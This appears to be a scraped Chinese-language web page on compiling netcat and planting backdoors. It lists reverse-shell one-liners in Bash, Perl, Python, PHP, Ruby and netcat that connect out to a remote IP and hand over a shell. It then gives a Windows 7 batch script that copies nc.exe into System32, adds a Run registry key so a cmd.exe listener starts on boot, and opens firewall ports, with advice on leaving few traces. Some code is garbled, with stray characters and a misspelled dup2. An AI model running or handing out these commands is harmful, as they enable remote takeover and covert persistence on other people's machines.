windows編譯netcat參數

『壹』 linux怎麼安裝netcat

etcat-0.7.1.tar.gz
然後當然是解壓了
tar zxvf netcat-0.7.1.tar.gz

解壓完畢之後會生成目錄，要cd進去
cd netcat-0.7.1
然後進行編譯前的配置。
./configure

配置完了之後就可以make編譯了。

編譯成功就生成了netcat可執行的文件了，位於src目錄，cd進去進行運行./netcat -h.如圖

本地Windows監聽
nc -vv -l -p 1234

遠程Windows轉發
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234

遠程Linux轉發
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php

———————NetCat for linux 參數e————————-
下載netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–

一句話反彈命令
[Bash]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

[PERL]
perl -e 『use Socket;$i=」10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(「tcp」));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,」>&S」);open(STDOUT,」>&S」);open(STDERR,」>&S」);exec(「/bin/sh -i」);};』

[python]
python -c 『import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((「10.0.0.1″,1234));os.p2(s.fileno(),0); os.p2(s.fileno(),1); os.p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);』

[PHP]
php -r 『$sock=fsockopen(「10.0.0.1″,1234);exec(「/bin/sh -i <&3 >&3 2>&3″);』

[Ruby]
ruby -rsocket -e』f=TCPSocket.open(「10.0.0.1″,1234).to_i;exec sprintf(「/bin/sh -i <&%d >&%d 2>&%d」,f,f,f)』

[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

『貳』 如何在Windows，Linux中安裝後門

0×00 准備工作
假設用戶以管理員許可權登錄系統，在Windows 7系統上使用netcat 創建一個後門。
Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創建一個攜帶型的工具包來解決這個問題 :
1.下載額外的文件和附加持續.
2.編輯修改指定文件.
3.快速創建執行後門.
4.控制遠程伺服器並進行惡作劇 ：）
為了便於你第一時間獲取到你的工具包，你需要將它放置在一個獨立的U盤或者在線伺服器上。
攜帶型工具(Portable Applications)
攜帶型工具是那些不需要安裝就能直接使用的程序，它們往往將所有的執行環境和核心程序本身一同打包成一個獨立的文顫塵件，方便攜帶。在獨立文件執行的過程中會自行釋放額的需求文件，並構建一個可順利執行目標程序的環境。
1.不依賴特定的dll(dll已經打包)
2.不依賴注冊表設置(有可能自行初始化) ，不遺留下任何注冊表操作痕跡
3.操作痕跡最小化，盡量避免一切不必要的操作，導致留下過多的系統操作記錄
創建 Windows 7 工具集
gVim (跨平台的文本編輯器, 提供強大的命令行操作交互)
Wget (下載 windows 64 位版本)
Netcat
有Kali系統的可以用命令 「find / -name nc.exe」搜索到 http://www.kali.org/ 或者下載已經編譯好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初試 Netcat 後門
nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監聽服姿緩務並等待客戶端連接， 在客戶端連接成功之後，會提供相應的交互服務。
– p 指定程序監聽的埠(非管理員許可權只能設置高於1024的埠. 同時不可復用現有埠)
– e 在接收到一個客戶端連接後, 會執行一個特定的程序(這里是cmd.exe), 這個程序負責接下來的會話交互(執行客戶端後期提交的任何命令)
– d 採取靜默監聽模式，避免nc運行過程中，產生過多額外的日誌跡洞模信息
Windows 7 後門安裝批處理腳本
@echo off
Rem 拷貝文件到系統目錄
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注冊表，增加後門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火牆規則，開放監聽的449埠，允許外部連接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火牆規則，允許nc.exe對外提供連接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"